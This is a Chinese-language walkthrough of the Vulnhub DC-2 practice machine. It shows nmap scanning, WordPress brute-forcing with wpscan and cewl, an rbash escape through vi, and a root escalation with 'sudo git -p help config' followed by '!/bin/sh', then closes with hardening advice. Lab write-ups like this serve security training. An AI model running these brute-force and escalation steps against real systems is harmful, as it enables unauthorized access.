Vulnhub靶机渗透学习——DC-2

Vulnhub靶机

Vulnhub靶机下载:/
官网地址:https://download.vulnhub.com/dc/DC-2.zip
Vulnhub靶机安装:
下载好了把安装包解压 然后使用VMware 打开即可。
DC-2:找到 5 个 flag

环境准备

攻击机:kali
靶机:DC-2
同一网卡

DC-2 靶机渗透

信息收集

kali里使用netdiscover发现主机(快一点)

netdiscover -i eth0 -r 192.168.0.0/24 

image.png
当然也可以用 nmap探测整个虚拟机网段存活主机,发现靶机ip:

nmap -sP -PI -PT 192.168.0.1/24

image.png
确认ip后,可以探测一下开放的端口信息及服务(注意这个靶场要全端口探测不然会漏掉 ssh-7744,后面会用到):

nmap -sCV 192.168.0.131 -p-

image.png
发现开了一个 80 和 7744 的 ssh 服务,并提示无法重定向到http://dc-2/,浏览器访问一下
Snipaste_2023-10-13_15-14-11.png
这里需要在 hosts 文件绑定一下域名
kali 里在/etc/hosts
image.png
windows 在C:\Windows\System32\drivers\etc
重新访问http://dc-2/
image.png
发现为为 wordpress4.7.10,网站下有个 flag 栏,点击查看
image.png
发现第一个 flag1

你通常的 wordlists 可能不起作用,所以,也许你只需要使用 cewl 。
密码越多越好,但有时你就是无法赢得所有的密码。
以一个人的身份登录以查看下一个标志
如果找不到,请以另一个用户登录。

cewl 是一个字典生成工具使用参考https://www.codercto.com/a/44828.html

暴力破解

这里先使用wpscan 扫描一下wordpress的账户或漏洞,kali 自带有

wpscan --url dc-2 -e

注:kali 使用 wpscan 更新 一般会报错
Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Couldn’t resolve host name)

参考https://blog.csdn.net/weixin_41705627/article/details/107296312解决
可以直接尝试替换 kali 下载源为阿里云,update 一下
image.png
发现三个用户名 :admin tom jerry
利用使用 wpscan(或hydra) 及cewl爬取的密码字典及自己的用户名字典进行暴力破解
先利用 cewl 爬取网站生成一个密码字典,写入 dc2.txt,并三个用户名保存为 user.txt

cewl -w dc2.txt -d 5 -m 4 http://dc-2
#d代表爬取深度

image.png
image.png
利用 wpscan 爆破账号密码

wpscan --url dc-2 -U ./user.txt -P ./dc2.txt

image.png

[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

竟然知道了用户密码,尝试登录后台

登录后台

利用目录扫描工具发现其后台登录地址

dirsearch -u http://dc-2/

image.png
发现其后台地址http://dc-2/wp-login.php
image.png
在 jerry 用户下发现 flag2 提示

如果你不能利用WordPress并走捷径,还有另一种方法。
希望你找到了另一个入口。

image.png

rbash 逃逸

tom账户 发现并没有什么可用的信息,根据提示,尝试前面端口扫描发现的 ssh,利用这两个账号尝试登录 jerry 没成功
image.png
tom 成功进入 shell
image.png
但是发现好多命令都不能执行,ls 可以,有个 flag3.txt 却读取不了 emmm
查看一下环境变量
Snipaste_2023-10-13_16-55-27.png
ls usr/bin 查看个执行哪些命令
image.png
发现 vi 可以执行,利用 vi 查看 flag3.txt
image.png

可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力而死。

根据提示尝试切换 jerry 用户试试
Snipaste_2023-10-13_17-00-53.png
命令还是不能执行,竟然这个环境变量不行,那换一种呢

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

image.png
也不行,想着 vi 可以用,那看看能不能利用 vi 提权https://gtfobins.github.io/
image.png
尝试一下,随便编辑一个文件

#按esc键后输入,然后回车
:set shell =/bin/sh
#再按esc键后输入,然后回车
:shell

image.png
命令仍不能执行,在这里卡住了,后来百度发现 vi 建立的 shell 可以编辑环境变量,那么再次尝试修改环境变量

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

image.png
发现成功

GIT 提权

根据上个 flag 提示切换 jerry 用户进行提权
image.png
切换后发现 jerry 也只是个普通权限,回到 jerry 根目录发现 flag4
image.png

很高兴看到你已经走了这么远——但你还没有到家。
你仍然需要获得最终的旗帜(唯一真正重要的旗帜!!)
这里没有提示——你现在要靠自己了。:-)
走吧,git 离开这里!!!

这里提示需要利用 git,输入命令,发现 git 存在
image.png
gtfobins 上搜索 git 提权方式
image.png

sudo git -p help config
#执行第一条命令后输入
!/bin/sh

image.png
成功提权到 root 用户

获取 flag

image.png

靶场总结

  1. wpscan工具使用(wordpress 靶场以及实际中非常常见)
  2. rbash 逃逸并提权(vi 进入 /bin/sh, 更改环境变量)
  3. 学会 git 提权
在进行Linux DC-2靶场渗透测试后,为了确保系统的安全性,需要对发现的漏洞进行修复。以下是一些常见的漏洞修复建议: 1. **更新系统和软件包**: - 定期更新操作系统和所有安装的软件包,以修补已知的安全漏洞。 - 使用包管理工具(如`apt`或`yum`)进行更新: ```bash sudo apt update && sudo apt upgrade -y ``` 2. **禁用不必要的服务**: - 关闭系统中不必要的服务和端口,减少攻击面。 - 使用`systemctl`命令管理服务: ```bash sudo systemctl disable <service_name> sudo systemctl stop <service_name> ``` 3. **配置防火墙**: - 设置防火墙规则,只允许必要的流量通过。 - 使用`ufw`或`iptables`配置防火墙: ```bash sudo ufw allow <port>/<protocol> sudo ufw enable ``` 4. **强化SSH配置**: - 禁用root用户远程登录。 - 更改默认SSH端口。 - 使用密钥认证而不是密码认证。 - 编辑`/etc/ssh/sshd_config`文件: ```bash PermitRootLogin no Port <new_port> PasswordAuthentication no ``` 5. **设置强密码策略**: - 强制用户设置复杂密码,并定期更换。 - 使用`pam_cracklib`或`pam_pwquality`模块配置密码策略: ```bash sudo apt install libpam-pwquality sudo vi /etc/pam.d/common-password ``` 6. **安装和配置入侵检测系统(IDS)**: - 安装如`Fail2Ban`或`Snort`等工具,监控和阻止可疑活动。 - 配置`Fail2Ban`防止暴力破解: ```bash sudo apt install fail2ban sudo vi /etc/fail2ban/jail.local ``` 7. **日志监控和分析**: - 定期检查系统日志,监控异常活动。 - 使用工具如`Logwatch`或`Splunk`进行日志分析: ```bash sudo apt install logwatch sudo vi /etc/logwatch/conf/logwatch.conf ``` 8. **文件权限和所有权**: - 确保文件和目录的权限和所有权设置正确,防止未授权访问。 - 使用`chmod`和`chown`命令修改权限和所有权: ```bash sudo chmod 644 <file> sudo chown <user>:<group> <file> ``` 9. **数据备份和恢复**: - 定期备份重要数据,并测试恢复过程。 - 使用工具如`rsync`或`tar`进行备份: ```bash sudo rsync -av --delete /data /backup ``` 通过以上措施,可以有效降低Linux DC-2靶场在渗透测试中暴露的风险,确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值